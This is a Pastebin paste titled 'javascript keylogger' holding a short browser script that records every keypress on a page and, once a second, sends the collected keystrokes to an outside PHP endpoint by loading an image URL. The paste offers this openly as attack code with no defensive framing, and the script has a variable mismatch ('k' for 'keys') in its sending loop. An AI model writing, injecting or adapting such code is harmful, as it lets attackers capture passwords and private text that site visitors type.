kcmcgill

javascript keylogger

Jul 17th, 2018
618
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var keys='';
  2. var url = 'http://www.twitterslut.org/forum/system/keylogger.php?c=';
  3.  
  4. document.onkeypress = function(e) {
  5.     get = window.event?event:e;
  6.     key = get.keyCode?get.keyCode:get.charCode;
  7.     key = String.fromCharCode(key);
  8.     keys+=key;
  9. }
  10. window.setInterval(function(){
  11.     if(k.length>0) {
  12.         new Image().src = url+keys;
  13.         keys = '';
  14.     }
  15. }, 1000);
Advertisement
Add Comment
Please, Sign In to add comment